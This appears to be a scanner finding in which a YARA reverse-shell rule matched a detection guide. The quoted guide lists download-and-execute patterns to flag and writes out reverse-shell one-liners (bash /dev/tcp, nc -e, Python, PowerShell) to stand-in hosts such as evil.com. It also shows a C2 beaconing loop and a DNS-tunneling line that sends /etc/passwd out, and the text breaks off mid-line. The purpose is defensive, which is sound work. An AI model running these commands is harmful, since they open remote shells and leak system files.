YARA rule 'reverse_shell': Reverse shell patterns in scripts or source code [malware]
- Category
- YARA Match
- Confidence
- 85% confidence
- Finding
YARA rule matched a known malware signature (reverse shell, backdoor, ransomware, C2 framework, or info stealer).
- Content
| python
,| powershell`- Encoded payloads: base64 decoded and executed
- URL shorteners hiding malicious destinations
Flag these commands:
text curl|wget + pipe to interpreter certutil -urlcache bitsadmin /transfer powershell.*downloadstring IEX.*WebClient python.*exec.*urlopen
3. Command & Control (C2) Patterns
3.1 Establishing C2 Communication
bash # Reverse shells "bash -i >& /dev/tcp/attacker.com/4444 0>&1" "nc -e /bin/bash attacker.com 4444" "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"evil.com\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'" "powershell -nop -c \"$c=New-Object Net.Sockets.TCPClient('evil.com',4444);$s=$c.GetStream();...\"" # Beaconing "while true; do curl https://c2.evil.com/beacon?id=$(hostname); sleep 300; done" "Register this host at: https://attacker.com/register?key=<system_info>" # DNS tunneling "nslookup $(cat /etc/passwd | base64).evi
